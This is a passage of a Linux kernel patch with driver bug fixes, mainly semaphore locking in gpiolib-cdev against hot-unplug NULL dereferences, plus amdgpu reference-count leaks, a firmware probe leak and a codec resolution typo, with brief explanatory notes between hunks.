+ }
+ 
+-static irqreturn_t tusb320_irq_handler(int irq, void *dev_id)
++static irqreturn_t tusb320_state_update_handler(struct tusb320_priv *priv,
++						bool force_update)
+ {
+-	struct tusb320_priv *priv = dev_id;
+ 	unsigned int reg;
+ 
+ 	if (regmap_read(priv->regmap, TUSB320_REG9, &reg)) {
+@@ -323,7 +323,7 @@ static irqreturn_t tusb320_irq_handler(int irq, void *dev_id)
+ 		return IRQ_NONE;
+ 	}
+ 
+-	if (!(reg & TUSB320_REG9_INTERRUPT_STATUS))
++	if (!force_update && !(reg & TUSB320_REG9_INTERRUPT_STATUS))
+ 		return IRQ_NONE;
+ 
+ 	tusb320_extcon_irq_handler(priv, reg);
+@@ -340,6 +340,13 @@ static irqreturn_t tusb320_irq_handler(int irq, void *dev_id)
+ 	return IRQ_HANDLED;
+ }
+ 
++static irqreturn_t tusb320_irq_handler(int irq, void *dev_id)
++{
++	struct tusb320_priv *priv = dev_id;
++
++	return tusb320_state_update_handler(priv, false);
++}
++
+ static const struct regmap_config tusb320_regmap_config = {
+ 	.reg_bits = 8,
+ 	.val_bits = 8,
+@@ -466,7 +473,7 @@ static int tusb320_probe(struct i2c_client *client,
+ 		return ret;
+ 
+ 	/* update initial state */
+-	tusb320_irq_handler(client->irq, priv);
++	tusb320_state_update_handler(priv, true);
+ 
+ 	/* Reset chip to its default state */
+ 	ret = tusb320_reset(priv);
+@@ -477,7 +484,7 @@ static int tusb320_probe(struct i2c_client *client,
+ 		 * State and polarity might change after a reset, so update
+ 		 * them again and make sure the interrupt status bit is cleared.
+ 		 */
+-		tusb320_irq_handler(client->irq, priv);
++		tusb320_state_update_handler(priv, true);
+ 
+ 	ret = devm_request_threaded_irq(priv->dev, client->irq, NULL,
+ 					tusb320_irq_handler,
+diff --git a/drivers/firmware/raspberrypi.c b/drivers/firmware/raspberrypi.c
+index 4b8978b254f9a..dba315f675bc7 100644
+--- a/drivers/firmware/raspberrypi.c
++++ b/drivers/firmware/raspberrypi.c
+@@ -272,6 +272,7 @@ static int rpi_firmware_probe(struct platform_device *pdev)
+ 		int ret = PTR_ERR(fw->chan);
+ 		if (ret != -EPROBE_DEFER)
+ 			dev_err(dev, "Failed to get mbox channel: %d\n", ret);
++		kfree(fw);
+ 		return ret;
+ 	}
+ 
+diff --git a/drivers/firmware/ti_sci.c b/drivers/firmware/ti_sci.c
+index ebc32bbd9b833..6281e7153b475 100644
+--- a/drivers/firmware/ti_sci.c
++++ b/drivers/firmware/ti_sci.c
+@@ -429,15 +429,14 @@ static inline int ti_sci_do_xfer(struct ti_sci_info *info,
+ 		 * during noirq phase, so we must manually poll the completion.
+ 		 */
+ 		ret = read_poll_timeout_atomic(try_wait_for_completion, done_state,
+-					       true, 1,
++					       done_state, 1,
+ 					       info->desc->max_rx_timeout_ms * 1000,
+ 					       false, &xfer->done);
+ 	}
+ 
+-	if (ret == -ETIMEDOUT || !done_state) {
++	if (ret == -ETIMEDOUT)
+ 		dev_err(dev, "Mbox timedout in resp(caller: %pS)\n",
+ 			(void *)_RET_IP_);
+-	}
+ 
+ 	/*
+ 	 * NOTE: we might prefer not to need the mailbox ticker to manage the
+diff --git a/drivers/gpio/gpiolib-cdev.c b/drivers/gpio/gpiolib-cdev.c
+index 0cb6b468f364f..6ab1cf489d035 100644
+--- a/drivers/gpio/gpiolib-cdev.c
++++ b/drivers/gpio/gpiolib-cdev.c
+@@ -55,6 +55,50 @@ static_assert(IS_ALIGNED(sizeof(struct gpio_v2_line_values), 8));
+  * interface to gpiolib GPIOs via ioctl()s.
+  */
+ 
++typedef __poll_t (*poll_fn)(struct file *, struct poll_table_struct *);
++typedef long (*ioctl_fn)(struct file *, unsigned int, unsigned long);
++typedef ssize_t (*read_fn)(struct file *, char __user *,
++			   size_t count, loff_t *);
++
++static __poll_t call_poll_locked(struct file *file,
++				 struct poll_table_struct *wait,
++				 struct gpio_device *gdev, poll_fn func)
++{
++	__poll_t ret;
++
++	down_read(&gdev->sem);
++	ret = func(file, wait);
++	up_read(&gdev->sem);
++
++	return ret;
++}
++
++static long call_ioctl_locked(struct file *file, unsigned int cmd,
++			      unsigned long arg, struct gpio_device *gdev,
++			      ioctl_fn func)
++{
++	long ret;
++
++	down_read(&gdev->sem);
++	ret = func(file, cmd, arg);
++	up_read(&gdev->sem);
++
++	return ret;
++}
++
++static ssize_t call_read_locked(struct file *file, char __user *buf,
++				size_t count, loff_t *f_ps,
++				struct gpio_device *gdev, read_fn func)
++{
++	ssize_t ret;
++
++	down_read(&gdev->sem);
++	ret = func(file, buf, count, f_ps);
++	up_read(&gdev->sem);
++
++	return ret;
++}
++
+ /*
+  * GPIO line handle management
+  */
+@@ -191,8 +235,8 @@ static long linehandle_set_config(struct linehandle_state *lh,
+ 	return 0;
+ }
+ 
+-static long linehandle_ioctl(struct file *file, unsigned int cmd,
+-			     unsigned long arg)
++static long linehandle_ioctl_unlocked(struct file *file, unsigned int cmd,
++				      unsigned long arg)
+ {
+ 	struct linehandle_state *lh = file->private_data;
+ 	void __user *ip = (void __user *)arg;
+@@ -201,6 +245,9 @@ static long linehandle_ioctl(struct file *file, unsigned int cmd,
+ 	unsigned int i;
+ 	int ret;
+ 
++	if (!lh->gdev->chip)
++		return -ENODEV;
++
+ 	switch (cmd) {
+ 	case GPIOHANDLE_GET_LINE_VALUES_IOCTL:
+ 		/* NOTE: It's okay to read values of output lines */
+@@ -247,6 +294,15 @@ static long linehandle_ioctl(struct file *file, unsigned int cmd,
+ 	}
+ }
+ 
++static long linehandle_ioctl(struct file *file, unsigned int cmd,
++			     unsigned long arg)
++{
++	struct linehandle_state *lh = file->private_data;
++
++	return call_ioctl_locked(file, cmd, arg, lh->gdev,
++				 linehandle_ioctl_unlocked);
++}
++
+ #ifdef CONFIG_COMPAT
+ static long linehandle_ioctl_compat(struct file *file, unsigned int cmd,
+ 				    unsigned long arg)
+@@ -1378,12 +1434,15 @@ static long linereq_set_config(struct linereq *lr, void __user *ip)
+ 	return ret;
+ }
+ 
+-static long linereq_ioctl(struct file *file, unsigned int cmd,
+-			  unsigned long arg)
++static long linereq_ioctl_unlocked(struct file *file, unsigned int cmd,
++				   unsigned long arg)
+ {
+ 	struct linereq *lr = file->private_data;
+ 	void __user *ip = (void __user *)arg;
+ 
++	if (!lr->gdev->chip)
++		return -ENODEV;
++
+ 	switch (cmd) {
+ 	case GPIO_V2_LINE_GET_VALUES_IOCTL:
+ 		return linereq_get_values(lr, ip);
+@@ -1396,6 +1455,15 @@ static long linereq_ioctl(struct file *file, unsigned int cmd,
+ 	}
+ }
+ 
++static long linereq_ioctl(struct file *file, unsigned int cmd,
++			  unsigned long arg)
++{
++	struct linereq *lr = file->private_data;
++
++	return call_ioctl_locked(file, cmd, arg, lr->gdev,
++				 linereq_ioctl_unlocked);
++}
++
+ #ifdef CONFIG_COMPAT
+ static long linereq_ioctl_compat(struct file *file, unsigned int cmd,
+ 				 unsigned long arg)
+@@ -1404,12 +1472,15 @@ static long linereq_ioctl_compat(struct file *file, unsigned int cmd,
+ }
+ #endif
+ 
+-static __poll_t linereq_poll(struct file *file,
+-			    struct poll_table_struct *wait)
++static __poll_t linereq_poll_unlocked(struct file *file,
++				      struct poll_table_struct *wait)
+ {
+ 	struct linereq *lr = file->private_data;
+ 	__poll_t events = 0;
+ 
++	if (!lr->gdev->chip)
++		return EPOLLHUP | EPOLLERR;
++
+ 	poll_wait(file, &lr->wait, wait);
+ 
+ 	if (!kfifo_is_empty_spinlocked_noirqsave(&lr->events,
+@@ -1419,16 +1490,25 @@ static __poll_t linereq_poll(struct file *file,
+ 	return events;
+ }
+ 
+-static ssize_t linereq_read(struct file *file,
+-			    char __user *buf,
+-			    size_t count,
+-			    loff_t *f_ps)
++static __poll_t linereq_poll(struct file *file,
++			     struct poll_table_struct *wait)
++{
++	struct linereq *lr = file->private_data;
++
++	return call_poll_locked(file, wait, lr->gdev, linereq_poll_unlocked);
++}
++
++static ssize_t linereq_read_unlocked(struct file *file, char __user *buf,
++				     size_t count, loff_t *f_ps)
+ {
+ 	struct linereq *lr = file->private_data;
+ 	struct gpio_v2_line_event le;
+ 	ssize_t bytes_read = 0;
+ 	int ret;
+ 
++	if (!lr->gdev->chip)
++		return -ENODEV;
++
+ 	if (count < sizeof(le))
+ 		return -EINVAL;
+ 
+@@ -1473,6 +1553,15 @@ static ssize_t linereq_read(struct file *file,
+ 	return bytes_read;
+ }
+ 
++static ssize_t linereq_read(struct file *file, char __user *buf,
++			    size_t count, loff_t *f_ps)
++{
++	struct linereq *lr = file->private_data;
++
++	return call_read_locked(file, buf, count, f_ps, lr->gdev,
++				linereq_read_unlocked);
++}
++
+ static void linereq_free(struct linereq *lr)
+ {
+ 	unsigned int i;
+@@ -1710,12 +1799,15 @@ struct lineevent_state {
+ 	(GPIOEVENT_REQUEST_RISING_EDGE | \
+ 	GPIOEVENT_REQUEST_FALLING_EDGE)
+ 
+-static __poll_t lineevent_poll(struct file *file,
+-			       struct poll_table_struct *wait)
++static __poll_t lineevent_poll_unlocked(struct file *file,
++					struct poll_table_struct *wait)
+ {
+ 	struct lineevent_state *le = file->private_data;
+ 	__poll_t events = 0;
+ 
++	if (!le->gdev->chip)
++		return EPOLLHUP | EPOLLERR;
++
+ 	poll_wait(file, &le->wait, wait);
+ 
+ 	if (!kfifo_is_empty_spinlocked_noirqsave(&le->events, &le->wait.lock))
+@@ -1724,15 +1816,21 @@ static __poll_t lineevent_poll(struct file *file,
+ 	return events;
+ }
+ 
++static __poll_t lineevent_poll(struct file *file,
++			       struct poll_table_struct *wait)
++{
++	struct lineevent_state *le = file->private_data;
++
++	return call_poll_locked(file, wait, le->gdev, lineevent_poll_unlocked);
++}
++
+ struct compat_gpioeevent_data {
+ 	compat_u64	timestamp;
+ 	u32		id;
+ };
+ 
+-static ssize_t lineevent_read(struct file *file,
+-			      char __user *buf,
+-			      size_t count,
+-			      loff_t *f_ps)
++static ssize_t lineevent_read_unlocked(struct file *file, char __user *buf,
++				       size_t count, loff_t *f_ps)
+ {
+ 	struct lineevent_state *le = file->private_data;
+ 	struct gpioevent_data ge;
+@@ -1740,6 +1838,9 @@ static ssize_t lineevent_read(struct file *file,
+ 	ssize_t ge_size;
+ 	int ret;
+ 
++	if (!le->gdev->chip)
++		return -ENODEV;
++
+ 	/*
+ 	 * When compatible system call is being used the struct gpioevent_data,
+ 	 * in case of at least ia32, has different size due to the alignment
+@@ -1797,6 +1898,15 @@ static ssize_t lineevent_read(struct file *file,
+ 	return bytes_read;
+ }
+ 
++static ssize_t lineevent_read(struct file *file, char __user *buf,
++			      size_t count, loff_t *f_ps)
++{
++	struct lineevent_state *le = file->private_data;
++
++	return call_read_locked(file, buf, count, f_ps, le->gdev,
++				lineevent_read_unlocked);
++}
++
+ static void lineevent_free(struct lineevent_state *le)
+ {
+ 	if (le->irq)
+@@ -1814,13 +1924,16 @@ static int lineevent_release(struct inode *inode, struct file *file)
+ 	return 0;
+ }
+ 
+-static long lineevent_ioctl(struct file *file, unsigned int cmd,
+-			    unsigned long arg)
++static long lineevent_ioctl_unlocked(struct file *file, unsigned int cmd,
++				     unsigned long arg)
+ {
+ 	struct lineevent_state *le = file->private_data;
+ 	void __user *ip = (void __user *)arg;
+ 	struct gpiohandle_data ghd;
+ 
++	if (!le->gdev->chip)
++		return -ENODEV;
++
+ 	/*
+ 	 * We can get the value for an event line but not set it,
+ 	 * because it is input by definition.
+@@ -1843,6 +1956,15 @@ static long lineevent_ioctl(struct file *file, unsigned int cmd,
+ 	return -EINVAL;
+ }
+ 
++static long lineevent_ioctl(struct file *file, unsigned int cmd,
++			    unsigned long arg)
++{
++	struct lineevent_state *le = file->private_data;
++
++	return call_ioctl_locked(file, cmd, arg, le->gdev,
++				 lineevent_ioctl_unlocked);
++}
++
+ #ifdef CONFIG_COMPAT
+ static long lineevent_ioctl_compat(struct file *file, unsigned int cmd,
+ 				   unsigned long arg)
+@@ -2401,12 +2523,15 @@ static int lineinfo_changed_notify(struct notifier_block *nb,
+ 	return NOTIFY_OK;
+ }
+ 
+-static __poll_t lineinfo_watch_poll(struct file *file,
+-				    struct poll_table_struct *pollt)
++static __poll_t lineinfo_watch_poll_unlocked(struct file *file,
++					     struct poll_table_struct *pollt)
+ {
+ 	struct gpio_chardev_data *cdev = file->private_data;
+ 	__poll_t events = 0;
+ 
++	if (!cdev->gdev->chip)
++		return EPOLLHUP | EPOLLERR;
++
+ 	poll_wait(file, &cdev->wait, pollt);
+ 
+ 	if (!kfifo_is_empty_spinlocked_noirqsave(&cdev->events,
+@@ -2416,8 +2541,17 @@ static __poll_t lineinfo_watch_poll(struct file *file,
+ 	return events;
+ }
+ 
+-static ssize_t lineinfo_watch_read(struct file *file, char __user *buf,
+-				   size_t count, loff_t *off)
++static __poll_t lineinfo_watch_poll(struct file *file,
++				    struct poll_table_struct *pollt)
++{
++	struct gpio_chardev_data *cdev = file->private_data;
++
++	return call_poll_locked(file, pollt, cdev->gdev,
++				lineinfo_watch_poll_unlocked);
++}
++
++static ssize_t lineinfo_watch_read_unlocked(struct file *file, char __user *buf,
++					    size_t count, loff_t *off)
+ {
+ 	struct gpio_chardev_data *cdev = file->private_data;
+ 	struct gpio_v2_line_info_changed event;
+@@ -2425,6 +2559,9 @@ static ssize_t lineinfo_watch_read(struct file *file, char __user *buf,
+ 	int ret;
+ 	size_t event_size;
+ 
++	if (!cdev->gdev->chip)
++		return -ENODEV;
++
+ #ifndef CONFIG_GPIO_CDEV_V1
+ 	event_size = sizeof(struct gpio_v2_line_info_changed);
+ 	if (count < event_size)
+@@ -2492,6 +2629,15 @@ static ssize_t lineinfo_watch_read(struct file *file, char __user *buf,
+ 	return bytes_read;
+ }
+ 
++static ssize_t lineinfo_watch_read(struct file *file, char __user *buf,
++				   size_t count, loff_t *off)
++{
++	struct gpio_chardev_data *cdev = file->private_data;
++
++	return call_read_locked(file, buf, count, off, cdev->gdev,
++				lineinfo_watch_read_unlocked);
++}
++
+ /**
+  * gpio_chrdev_open() - open the chardev for ioctl operations
+  * @inode: inode for this chardev
+@@ -2505,13 +2651,17 @@ static int gpio_chrdev_open(struct inode *inode, struct file *file)
+ 	struct gpio_chardev_data *cdev;
+ 	int ret = -ENOMEM;
+ 
++	down_read(&gdev->sem);
++
+ 	/* Fail on open if the backing gpiochip is gone */
+-	if (!gdev->chip)
+-		return -ENODEV;
++	if (!gdev->chip) {
++		ret = -ENODEV;
++		goto out_unlock;
++	}
+ 
+ 	cdev = kzalloc(sizeof(*cdev), GFP_KERNEL);
+ 	if (!cdev)
+-		return -ENOMEM;
++		goto out_unlock;
+ 
+ 	cdev->watched_lines = bitmap_zalloc(gdev->chip->ngpio, GFP_KERNEL);
+ 	if (!cdev->watched_lines)
+@@ -2534,6 +2684,8 @@ static int gpio_chrdev_open(struct inode *inode, struct file *file)
+ 	if (ret)
+ 		goto out_unregister_notifier;
+ 
++	up_read(&gdev->sem);
++
+ 	return ret;
+ 
+ out_unregister_notifier:
+@@ -2543,6 +2695,8 @@ out_free_bitmap:
+ 	bitmap_free(cdev->watched_lines);
+ out_free_cdev:
+ 	kfree(cdev);
++out_unlock:
++	up_read(&gdev->sem);
+ 	return ret;
+ }
+ 
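The gpiolib-cdev hunks above all apply one pattern: each file operation is split into an *_unlocked worker plus a thin wrapper that serializes against hot-unplug through gdev->sem before the worker re-checks gdev->chip, while gpiochip_remove() (in the gpiolib.c hunk below) takes the same semaphore for writing around unregistration. A minimal sketch of what a helper like the call_ioctl_locked() referenced above could look like; its exact shape is defined earlier in this patch and is assumed here, and struct gdev_like is a hypothetical reduction of struct gpio_device:

#include <linux/fs.h>
#include <linux/rwsem.h>

/* Hypothetical reduction of struct gpio_device to the fields at play. */
struct gdev_like {
	struct rw_semaphore sem;	/* write-held across unregistration */
	void *chip;			/* NULL once the hardware is gone */
};

typedef long (*locked_ioctl_fn)(struct file *file, unsigned int cmd,
				unsigned long arg);

/*
 * Assumed shape of call_ioctl_locked(): take the semaphore shared so
 * gpiochip_remove() cannot clear ->chip mid-call, then run the worker,
 * which re-checks ->chip and returns -ENODEV if the chip is gone.
 */
static long call_ioctl_locked(struct file *file, unsigned int cmd,
			      unsigned long arg, struct gdev_like *gdev,
			      locked_ioctl_fn func)
{
	long ret;

	down_read(&gdev->sem);
	ret = func(file, cmd, arg);
	up_read(&gdev->sem);

	return ret;
}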
+diff --git a/drivers/gpio/gpiolib.c b/drivers/gpio/gpiolib.c
+index a70522aef3557..5974cfc61b417 100644
+--- a/drivers/gpio/gpiolib.c
++++ b/drivers/gpio/gpiolib.c
+@@ -735,6 +735,7 @@ int gpiochip_add_data_with_key(struct gpio_chip *gc, void *data,
+ 	spin_unlock_irqrestore(&gpio_lock, flags);
+ 
+ 	BLOCKING_INIT_NOTIFIER_HEAD(&gdev->notifier);
++	init_rwsem(&gdev->sem);
+ 
+ #ifdef CONFIG_PINCTRL
+ 	INIT_LIST_HEAD(&gdev->pin_ranges);
+@@ -875,6 +876,8 @@ void gpiochip_remove(struct gpio_chip *gc)
+ 	unsigned long	flags;
+ 	unsigned int	i;
+ 
++	down_write(&gdev->sem);
++
+ 	/* FIXME: should the legacy sysfs handling be moved to gpio_device? */
+ 	gpiochip_sysfs_unregister(gdev);
+ 	gpiochip_free_hogs(gc);
+@@ -909,6 +912,7 @@ void gpiochip_remove(struct gpio_chip *gc)
+ 	 * gone.
+ 	 */
+ 	gcdev_unregister(gdev);
++	up_write(&gdev->sem);
+ 	put_device(&gdev->dev);
+ }
+ EXPORT_SYMBOL_GPL(gpiochip_remove);
+diff --git a/drivers/gpio/gpiolib.h b/drivers/gpio/gpiolib.h
+index d900ecdbac46d..9ad68a0adf4a8 100644
+--- a/drivers/gpio/gpiolib.h
++++ b/drivers/gpio/gpiolib.h
+@@ -15,6 +15,7 @@
+ #include <linux/device.h>
+ #include <linux/module.h>
+ #include <linux/cdev.h>
++#include <linux/rwsem.h>
+ 
+ #define GPIOCHIP_NAME	"gpiochip"
+ 
+@@ -39,6 +40,9 @@
+  * @list: links gpio_device:s together for traversal
+  * @notifier: used to notify subscribers about lines being requested, released
+  *            or reconfigured
++ * @sem: protects the structure from a NULL-pointer dereference of @chip by
++ *       user-space operations when the device gets unregistered during
++ *       a hot-unplug event
+  * @pin_ranges: range of pins served by the GPIO driver
+  *
+  * This state container holds most of the runtime variable data
+@@ -60,6 +64,7 @@ struct gpio_device {
+ 	void			*data;
+ 	struct list_head        list;
+ 	struct blocking_notifier_head notifier;
++	struct rw_semaphore	sem;
+ 
+ #ifdef CONFIG_PINCTRL
+ 	/*
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c
+index 1f76e27f1a354..fe87b3402f06a 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c
+@@ -2256,7 +2256,7 @@ int amdgpu_amdkfd_gpuvm_import_dmabuf(struct amdgpu_device *adev,
+ 
+ 	ret = drm_vma_node_allow(&obj->vma_node, drm_priv);
+ 	if (ret) {
+-		kfree(mem);
++		kfree(*mem);
+ 		return ret;
+ 	}
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_bios.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_bios.c
+index e363f56c72af1..30c28a69e847d 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_bios.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_bios.c
+@@ -317,6 +317,7 @@ static bool amdgpu_atrm_get_bios(struct amdgpu_device *adev)
+ 
+ 	if (!found)
+ 		return false;
++	pci_dev_put(pdev);
+ 
+ 	adev->bios = kmalloc(size, GFP_KERNEL);
+ 	if (!adev->bios) {
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+index f1e9663b40510..913f22d41673d 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+@@ -2462,6 +2462,11 @@ static int amdgpu_device_ip_init(struct amdgpu_device *adev)
+ 			if (!amdgpu_sriov_vf(adev)) {
+ 				struct amdgpu_hive_info *hive = amdgpu_get_xgmi_hive(adev);
+ 
++				if (WARN_ON(!hive)) {
++					r = -ENOENT;
++					goto init_failed;
++				}
++
+ 				if (!hive->reset_domain ||
+ 				    !amdgpu_reset_get_reset_domain(hive->reset_domain)) {
+ 					r = -ENOENT;
+@@ -5027,6 +5032,8 @@ static void amdgpu_device_resume_display_audio(struct amdgpu_device *adev)
+ 		pm_runtime_enable(&(p->dev));
+ 		pm_runtime_resume(&(p->dev));
+ 	}
++
++	pci_dev_put(p);
+ }
+ 
+ static int amdgpu_device_suspend_display_audio(struct amdgpu_device *adev)
+@@ -5065,6 +5072,7 @@ static int amdgpu_device_suspend_display_audio(struct amdgpu_device *adev)
+ 
+ 		if (expires < ktime_get_mono_fast_ns()) {
+ 			dev_warn(adev->dev, "failed to suspend display audio\n");
++			pci_dev_put(p);
+ 			/* TODO: abort the succeeding gpu reset? */
+ 			return -ETIMEDOUT;
+ 		}
+@@ -5072,6 +5080,7 @@ static int amdgpu_device_suspend_display_audio(struct amdgpu_device *adev)
+ 
+ 	pm_runtime_disable(&(p->dev));
+ 
++	pci_dev_put(p);
+ 	return 0;
+ }
+ 
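A recurring fix in the amdgpu_bios.c and amdgpu_device.c hunks above: pci_get_device()/pci_get_class() return a referenced struct pci_dev, so every exit path, including the early -ETIMEDOUT bail-out, must pci_dev_put() it. The idiom as a hedged sketch; the class code and predicate below are stand-ins, not the driver's actual lookup:

#include <linux/pci.h>

static bool want_this_dev(struct pci_dev *p)
{
	return p->vendor == PCI_VENDOR_ID_ATI;	/* hypothetical predicate */
}

static struct pci_dev *find_audio_fn(void)
{
	struct pci_dev *p = NULL;

	/*
	 * pci_get_class() drops the reference on 'from' each iteration,
	 * so only the device we return still holds a reference; the
	 * caller must pci_dev_put() it on *every* path, error or not.
	 */
	while ((p = pci_get_class(PCI_CLASS_MULTIMEDIA_HD_AUDIO << 8, p))) {
		if (want_this_dev(p))
			return p;
	}
	return NULL;
}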
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_virt.h b/drivers/gpu/drm/amd/amdgpu/amdgpu_virt.h
+index 49c4347d154ce..2b9d806e23afb 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_virt.h
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_virt.h
+@@ -75,6 +75,8 @@ struct amdgpu_vf_error_buffer {
+ 	uint64_t data[AMDGPU_VF_ERROR_ENTRY_SIZE];
+ };
+ 
++enum idh_request;
++
+ /**
+  * struct amdgpu_virt_ops - amdgpu device virt operations
+  */
+@@ -84,7 +86,8 @@ struct amdgpu_virt_ops {
+ 	int (*req_init_data)(struct amdgpu_device *adev);
+ 	int (*reset_gpu)(struct amdgpu_device *adev);
+ 	int (*wait_reset)(struct amdgpu_device *adev);
+-	void (*trans_msg)(struct amdgpu_device *adev, u32 req, u32 data1, u32 data2, u32 data3);
++	void (*trans_msg)(struct amdgpu_device *adev, enum idh_request req,
++			  u32 data1, u32 data2, u32 data3);
+ };
+ 
+ /*
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_xgmi.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_xgmi.c
+index 47159e9a08848..4b9e7b050ccd2 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_xgmi.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_xgmi.c
+@@ -386,7 +386,6 @@ struct amdgpu_hive_info *amdgpu_get_xgmi_hive(struct amdgpu_device *adev)
+ 	if (ret) {
+ 		dev_err(adev->dev, "XGMI: failed initializing kobject for xgmi hive\n");
+ 		kobject_put(&hive->kobj);
+-		kfree(hive);
+ 		hive = NULL;
+ 		goto pro_end;
+ 	}
+@@ -410,7 +409,6 @@ struct amdgpu_hive_info *amdgpu_get_xgmi_hive(struct amdgpu_device *adev)
+ 				dev_err(adev->dev, "XGMI: failed initializing reset domain for xgmi hive\n");
+ 				ret = -ENOMEM;
+ 				kobject_put(&hive->kobj);
+-				kfree(hive);
+ 				hive = NULL;
+ 				goto pro_end;
+ 			}
+diff --git a/drivers/gpu/drm/amd/amdgpu/nv.c b/drivers/gpu/drm/amd/amdgpu/nv.c
+index b3fba8dea63ca..6853b93ac82e7 100644
+--- a/drivers/gpu/drm/amd/amdgpu/nv.c
++++ b/drivers/gpu/drm/amd/amdgpu/nv.c
+@@ -82,10 +82,10 @@ static const struct amdgpu_video_codecs nv_video_codecs_encode =
+ /* Navi1x */
+ static const struct amdgpu_video_codec_info nv_video_codecs_decode_array[] =
+ {
+-	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG2, 4096, 4906, 3)},
+-	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4, 4096, 4906, 5)},
+-	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4_AVC, 4096, 4906, 52)},
+-	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_VC1, 4096, 4906, 4)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG2, 4096, 4096, 3)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4, 4096, 4096, 5)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4_AVC, 4096, 4096, 52)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_VC1, 4096, 4096, 4)},
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_HEVC, 8192, 4352, 186)},
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_JPEG, 4096, 4096, 0)},
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_VP9, 8192, 4352, 0)},
+@@ -100,10 +100,10 @@ static const struct amdgpu_video_codecs nv_video_codecs_decode =
+ /* Sienna Cichlid */
+ static const struct amdgpu_video_codec_info sc_video_codecs_decode_array[] =
+ {
+-	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG2, 4096, 4906, 3)},
+-	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4, 4096, 4906, 5)},
+-	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4_AVC, 4096, 4906, 52)},
+-	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_VC1, 4096, 4906, 4)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG2, 4096, 4096, 3)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4, 4096, 4096, 5)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4_AVC, 4096, 4096, 52)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_VC1, 4096, 4096, 4)},
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_HEVC, 8192, 4352, 186)},
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_JPEG, 4096, 4096, 0)},
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_VP9, 8192, 4352, 0)},
+@@ -125,10 +125,10 @@ static struct amdgpu_video_codec_info sriov_sc_video_codecs_encode_array[] =
+ 
+ static struct amdgpu_video_codec_info sriov_sc_video_codecs_decode_array[] =
+ {
+-	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG2, 4096, 4906, 3)},
+-	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4, 4096, 4906, 5)},
+-	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4_AVC, 4096, 4906, 52)},
+-	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_VC1, 4096, 4906, 4)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG2, 4096, 4096, 3)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4, 4096, 4096, 5)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4_AVC, 4096, 4096, 52)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_VC1, 4096, 4096, 4)},
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_HEVC, 8192, 4352, 186)},
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_JPEG, 4096, 4096, 0)},
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_VP9, 8192, 4352, 0)},
+@@ -149,7 +149,7 @@ static struct amdgpu_video_codecs sriov_sc_video_codecs_decode =
+ 
+ /* Beige Goby*/
+ static const struct amdgpu_video_codec_info bg_video_codecs_decode_array[] = {
+-	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4_AVC, 4096, 4906, 52)},
